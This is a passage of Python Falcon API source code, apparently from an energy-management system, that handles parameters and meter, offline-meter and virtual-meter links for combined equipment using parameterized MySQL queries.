" WHERE id = %s ")
cursor.execute(query, (point_id, ))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.POINT_NOT_FOUND')
elif parameter_type == 'constant':
if constant is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_CONSTANT_VALUE')
elif parameter_type == 'fraction':
query = (" SELECT id, name, uuid "
" FROM tbl_meters ")
cursor.execute(query)
rows_meters = cursor.fetchall()
meter_dict = dict()
if rows_meters is not None and len(rows_meters) > 0:
for row in rows_meters:
meter_dict[row['uuid']] = {"type": 'meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_offline_meters ")
cursor.execute(query)
rows_offline_meters = cursor.fetchall()
offline_meter_dict = dict()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
for row in rows_offline_meters:
offline_meter_dict[row['uuid']] = {"type": 'offline_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_virtual_meters ")
cursor.execute(query)
rows_virtual_meters = cursor.fetchall()
virtual_meter_dict = dict()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
for row in rows_virtual_meters:
virtual_meter_dict[row['uuid']] = {"type": 'virtual_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
# validate numerator meter uuid
if meter_dict.get(numerator_meter_uuid) is None and \
virtual_meter_dict.get(numerator_meter_uuid) is None and \
offline_meter_dict.get(numerator_meter_uuid) is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_NUMERATOR_METER_UUID')
# validate denominator meter uuid
if denominator_meter_uuid == numerator_meter_uuid:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_DENOMINATOR_METER_UUID')
if denominator_meter_uuid not in meter_dict and \
denominator_meter_uuid not in virtual_meter_dict and \
denominator_meter_uuid not in offline_meter_dict:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_DENOMINATOR_METER_UUID')
add_values = (" INSERT INTO tbl_combined_equipments_parameters "
" (combined_equipment_id, name, parameter_type, constant, "
" point_id, numerator_meter_uuid, denominator_meter_uuid) "
" VALUES (%s, %s, %s, %s, %s, %s, %s) ")
cursor.execute(add_values, (id_,
name,
parameter_type,
constant,
point_id,
numerator_meter_uuid,
denominator_meter_uuid))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(id_) + 'parameters/' + str(new_id)
class CombinedEquipmentParameterItem:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentParameterItem"""
pass
@staticmethod
def on_options(req, resp, id_, pid):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_, pid):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not pid.isdigit() or int(pid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
query = (" SELECT id, name "
" FROM tbl_points ")
cursor.execute(query)
rows_points = cursor.fetchall()
point_dict = dict()
if rows_points is not None and len(rows_points) > 0:
for row in rows_points:
point_dict[row['id']] = {"id": row['id'],
"name": row['name']}
query = (" SELECT id, name, uuid "
" FROM tbl_meters ")
cursor.execute(query)
rows_meters = cursor.fetchall()
meter_dict = dict()
if rows_meters is not None and len(rows_meters) > 0:
for row in rows_meters:
meter_dict[row['uuid']] = {"type": 'meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_offline_meters ")
cursor.execute(query)
rows_offline_meters = cursor.fetchall()
offline_meter_dict = dict()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
for row in rows_offline_meters:
offline_meter_dict[row['uuid']] = {"type": 'offline_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_virtual_meters ")
cursor.execute(query)
rows_virtual_meters = cursor.fetchall()
virtual_meter_dict = dict()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
for row in rows_virtual_meters:
virtual_meter_dict[row['uuid']] = {"type": 'virtual_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, parameter_type, "
" constant, point_id, numerator_meter_uuid, denominator_meter_uuid "
" FROM tbl_combined_equipments_parameters "
" WHERE combined_equipment_id = %s AND id = %s ")
cursor.execute(query, (id_, pid))
row = cursor.fetchone()
cursor.close()
cnx.disconnect()
if row is None:
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_PARAMETER_NOT_FOUND_OR_NOT_MATCH')
else:
constant = None
point = None
numerator_meter = None
denominator_meter = None
if row['parameter_type'] == 'point':
point = point_dict.get(row['point_id'], None)
constant = None
numerator_meter = None
denominator_meter = None
elif row['parameter_type'] == 'constant':
constant = row['constant']
point = None
numerator_meter = None
denominator_meter = None
elif row['parameter_type'] == 'fraction':
constant = None
point = None
# find numerator meter by uuid
numerator_meter = meter_dict.get(row['numerator_meter_uuid'], None)
if numerator_meter is None:
numerator_meter = virtual_meter_dict.get(row['numerator_meter_uuid'], None)
if numerator_meter is None:
numerator_meter = offline_meter_dict.get(row['numerator_meter_uuid'], None)
# find denominator meter by uuid
denominator_meter = meter_dict.get(row['denominator_meter_uuid'], None)
if denominator_meter is None:
denominator_meter = virtual_meter_dict.get(row['denominator_meter_uuid'], None)
if denominator_meter is None:
denominator_meter = offline_meter_dict.get(row['denominator_meter_uuid'], None)
meta_result = {"id": row['id'],
"name": row['name'],
"parameter_type": row['parameter_type'],
"constant": constant,
"point": point,
"numerator_meter": numerator_meter,
"denominator_meter": denominator_meter}
resp.text = json.dumps(meta_result)
@staticmethod
@user_logger
def on_delete(req, resp, id_, pid):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not pid.isdigit() or int(pid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ",
(id_,))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments_parameters "
" WHERE combined_equipment_id = %s AND id = %s ",
(id_, pid,))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_PARAMETER_NOT_FOUND_OR_NOT_MATCH')
cursor.execute(" DELETE FROM tbl_combined_equipments_parameters "
" WHERE id = %s ", (pid, ))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
@staticmethod
@user_logger
def on_put(req, resp, id_, pid):
"""Handles PUT requests"""
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not pid.isdigit() or int(pid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_ID')
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR', description=ex)
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_NAME')
name = str.strip(new_values['data']['name'])
if 'parameter_type' not in new_values['data'].keys() or \
not isinstance(new_values['data']['parameter_type'], str) or \
len(str.strip(new_values['data']['parameter_type'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_TYPE')
parameter_type = str.strip(new_values['data']['parameter_type'])
if parameter_type not in ('constant', 'point', 'fraction'):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_PARAMETER_TYPE')
constant = None
if 'constant' in new_values['data'].keys():
if new_values['data']['constant'] is not None and \
isinstance(new_values['data']['constant'], str) and \
len(str.strip(new_values['data']['constant'])) > 0:
constant = str.strip(new_values['data']['constant'])
point_id = None
if 'point_id' in new_values['data'].keys():
if new_values['data']['point_id'] is not None and \
new_values['data']['point_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_POINT_ID')
point_id = new_values['data']['point_id']
numerator_meter_uuid = None
if 'numerator_meter_uuid' in new_values['data'].keys():
if new_values['data']['numerator_meter_uuid'] is not None and \
isinstance(new_values['data']['numerator_meter_uuid'], str) and \
len(str.strip(new_values['data']['numerator_meter_uuid'])) > 0:
numerator_meter_uuid = str.strip(new_values['data']['numerator_meter_uuid'])
denominator_meter_uuid = None
if 'denominator_meter_uuid' in new_values['data'].keys():
if new_values['data']['denominator_meter_uuid'] is not None and \
isinstance(new_values['data']['denominator_meter_uuid'], str) and \
len(str.strip(new_values['data']['denominator_meter_uuid'])) > 0:
denominator_meter_uuid = str.strip(new_values['data']['denominator_meter_uuid'])
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments_parameters "
" WHERE combined_equipment_id = %s AND id = %s ",
(id_, pid,))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_PARAMETER_NOT_FOUND_OR_NOT_MATCH')
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments_parameters "
" WHERE name = %s AND combined_equipment_id = %s AND id != %s ", (name, id_, pid))
row = cursor.fetchone()
if row is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.COMBINED_EQUIPMENT_PARAMETER_NAME_IS_ALREADY_IN_USE')
# validate by parameter type
if parameter_type == 'point':
if point_id is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_POINT_ID')
query = (" SELECT id, name "
" FROM tbl_points "
" WHERE id = %s ")
cursor.execute(query, (point_id, ))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.POINT_NOT_FOUND')
elif parameter_type == 'constant':
if constant is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_CONSTANT_VALUE')
elif parameter_type == 'fraction':
query = (" SELECT id, name, uuid "
" FROM tbl_meters ")
cursor.execute(query)
rows_meters = cursor.fetchall()
meter_dict = dict()
if rows_meters is not None and len(rows_meters) > 0:
for row in rows_meters:
meter_dict[row['uuid']] = {"type": 'meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_offline_meters ")
cursor.execute(query)
rows_offline_meters = cursor.fetchall()
offline_meter_dict = dict()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
for row in rows_offline_meters:
offline_meter_dict[row['uuid']] = {"type": 'offline_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_virtual_meters ")
cursor.execute(query)
rows_virtual_meters = cursor.fetchall()
virtual_meter_dict = dict()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
for row in rows_virtual_meters:
virtual_meter_dict[row['uuid']] = {"type": 'virtual_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
# validate numerator meter uuid
if meter_dict.get(numerator_meter_uuid) is None and \
virtual_meter_dict.get(numerator_meter_uuid) is None and \
offline_meter_dict.get(numerator_meter_uuid) is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_NUMERATOR_METER_UUID')
# validate denominator meter uuid
if denominator_meter_uuid == numerator_meter_uuid:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_DENOMINATOR_METER_UUID')
if denominator_meter_uuid not in meter_dict and \
denominator_meter_uuid not in virtual_meter_dict and \
denominator_meter_uuid not in offline_meter_dict:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_DENOMINATOR_METER_UUID')
add_values = (" UPDATE tbl_combined_equipments_parameters "
" SET name = %s , parameter_type = %s, constant = %s, "
" point_id = %s, numerator_meter_uuid = %s, denominator_meter_uuid =%s "
" WHERE id = %s ")
cursor.execute(add_values, (name,
parameter_type,
constant,
point_id,
numerator_meter_uuid,
denominator_meter_uuid,
pid))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_200
class CombinedEquipmentMeterCollection:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentMeterCollection"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT id, name, uuid "
" FROM tbl_energy_categories ")
cursor.execute(query)
rows_energy_categories = cursor.fetchall()
energy_category_dict = dict()
if rows_energy_categories is not None and len(rows_energy_categories) > 0:
for row in rows_energy_categories:
energy_category_dict[row['id']] = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT m.id, m.name, m.uuid, m.energy_category_id, em.is_output "
" FROM tbl_combined_equipments e, tbl_combined_equipments_meters em, tbl_meters m "
" WHERE em.combined_equipment_id = e.id AND m.id = em.meter_id AND e.id = %s "
" ORDER BY m.id ")
cursor.execute(query, (id_,))
rows = cursor.fetchall()
result = list()
if rows is not None and len(rows) > 0:
for row in rows:
energy_category = energy_category_dict.get(row['energy_category_id'], None)
meta_result = {"id": row['id'], "name": row['name'], "uuid": row['uuid'],
"energy_category": energy_category,
"is_output": bool(row['is_output'])}
result.append(meta_result)
resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles POST requests"""
access_control(req)
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=ex)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
new_values = json.loads(raw_json)
if 'meter_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['meter_id'], int) or \
new_values['data']['meter_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_METER_ID')
meter_id = new_values['data']['meter_id']
if 'is_output' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_output'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_OUTPUT_VALUE')
is_output = new_values['data']['is_output']
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" from tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_meters "
" WHERE id = %s ", (meter_id,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.METER_NOT_FOUND')
query = (" SELECT id "
" FROM tbl_combined_equipments_meters "
" WHERE combined_equipment_id = %s AND meter_id = %s")
cursor.execute(query, (id_, meter_id,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR',
description='API.COMBINED_EQUIPMENT_METER_RELATION_EXISTS')
add_row = (" INSERT INTO tbl_combined_equipments_meters (combined_equipment_id, meter_id, is_output ) "
" VALUES (%s, %s, %s) ")
cursor.execute(add_row, (id_, meter_id, is_output))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(id_) + '/meters/' + str(meter_id)
class CombinedEquipmentMeterItem:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentMeterItem"""
pass
@staticmethod
def on_options(req, resp, id_, mid):
resp.status = falcon.HTTP_200
@staticmethod
@user_logger
def on_delete(req, resp, id_, mid):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not mid.isdigit() or int(mid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_METER_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_meters "
" WHERE id = %s ", (mid,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.METER_NOT_FOUND')
cursor.execute(" SELECT id "
" FROM tbl_combined_equipments_meters "
" WHERE combined_equipment_id = %s AND meter_id = %s ", (id_, mid))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_METER_RELATION_NOT_FOUND')
cursor.execute(" DELETE FROM tbl_combined_equipments_meters "
" WHERE combined_equipment_id = %s AND meter_id = %s ", (id_, mid))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
class CombinedEquipmentOfflineMeterCollection:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentOfflineMeterCollection"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT id, name, uuid "
" FROM tbl_energy_categories ")
cursor.execute(query)
rows_energy_categories = cursor.fetchall()
energy_category_dict = dict()
if rows_energy_categories is not None and len(rows_energy_categories) > 0:
for row in rows_energy_categories:
energy_category_dict[row['id']] = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT m.id, m.name, m.uuid, m.energy_category_id, em.is_output "
" FROM tbl_combined_equipments e, tbl_combined_equipments_offline_meters em, tbl_offline_meters m "
" WHERE em.combined_equipment_id = e.id AND m.id = em.offline_meter_id AND e.id = %s "
" ORDER BY m.id ")
cursor.execute(query, (id_,))
rows = cursor.fetchall()
result = list()
if rows is not None and len(rows) > 0:
for row in rows:
energy_category = energy_category_dict.get(row['energy_category_id'], None)
meta_result = {"id": row['id'], "name": row['name'], "uuid": row['uuid'],
"energy_category": energy_category,
"is_output": bool(row['is_output'])}
result.append(meta_result)
resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles POST requests"""
access_control(req)
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=ex)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
new_values = json.loads(raw_json)
if 'offline_meter_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['offline_meter_id'], int) or \
new_values['data']['offline_meter_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_OFFLINE_METER_ID')
offline_meter_id = new_values['data']['offline_meter_id']
if 'is_output' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_output'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_OUTPUT_VALUE')
is_output = new_values['data']['is_output']
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" from tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_offline_meters "
" WHERE id = %s ", (offline_meter_id,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.OFFLINE_METER_NOT_FOUND')
query = (" SELECT id "
" FROM tbl_combined_equipments_offline_meters "
" WHERE combined_equipment_id = %s AND offline_meter_id = %s")
cursor.execute(query, (id_, offline_meter_id,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR',
description='API.COMBINED_EQUIPMENT_OFFLINE_METER_RELATION_EXISTS')
add_row = (" INSERT INTO tbl_combined_equipments_offline_meters "
" (combined_equipment_id, offline_meter_id, is_output ) "
" VALUES (%s, %s, %s) ")
cursor.execute(add_row, (id_, offline_meter_id, is_output))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(id_) + '/offlinemeters/' + str(offline_meter_id)
class CombinedEquipmentOfflineMeterItem:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentOfflineMeterItem"""
pass
@staticmethod
def on_options(req, resp, id_, mid):
resp.status = falcon.HTTP_200
@staticmethod
@user_logger
def on_delete(req, resp, id_, mid):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not mid.isdigit() or int(mid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_OFFLINE_METER_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_offline_meters "
" WHERE id = %s ", (mid,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.OFFLINE_METER_NOT_FOUND')
cursor.execute(" SELECT id "
" FROM tbl_combined_equipments_offline_meters "
" WHERE combined_equipment_id = %s AND offline_meter_id = %s ", (id_, mid))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_OFFLINE_METER_RELATION_NOT_FOUND')
cursor.execute(" DELETE FROM tbl_combined_equipments_offline_meters "
" WHERE combined_equipment_id = %s AND offline_meter_id = %s ", (id_, mid))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
class CombinedEquipmentVirtualMeterCollection:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentVirtualMeterCollection"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT id, name, uuid "
" FROM tbl_energy_categories ")
cursor.execute(query)
rows_energy_categories = cursor.fetchall()
energy_category_dict = dict()
if rows_energy_categories is not None and len(rows_energy_categories) > 0:
for row in rows_energy_categories:
energy_category_dict[row['id']] = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT m.id, m.name, m.uuid, m.energy_category_id, em.is_output "
" FROM tbl_combined_equipments e, tbl_combined_equipments_virtual_meters em, tbl_virtual_meters m "
" WHERE em.combined_equipment_id = e.id AND m.id = em.virtual_meter_id AND e.id = %s "
" ORDER BY m.id ")
cursor.execute(query, (id_,))
rows = cursor.fetchall()
result = list()
if rows is not None and len(rows) > 0:
for row in rows:
energy_category = energy_category_dict.get(row['energy_category_id'], None)
meta_result = {"id": row['id'], "name": row['name'], "uuid": row['uuid'],
"energy_category": energy_category,
"is_output": bool(row['is_output'])}
result.append(meta_result)
resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles POST requests"""
access_control(req)
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=ex)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
new_values = json.loads(raw_json)
if 'virtual_meter_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['virtual_meter_id'], int) or \
new_values['data']['virtual_meter_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_VIRTUAL_METER_ID')
virtual_meter_id = new_values['data']['virtual_meter_id']
if 'is_output' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_output'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_OUTPUT_VALUE')
is_output = new_values['data']['is_output']
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" from tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_virtual_meters "
" WHERE id = %s ", (virtual_meter_id,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.VIRTUAL_METER_NOT_FOUND')
query = (" SELECT id "
" FROM tbl_combined_equipments_virtual_meters "
" WHERE combined_equipment_id = %s AND virtual_meter_id = %s")
cursor.execute(query, (id_, virtual_meter_id,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR',
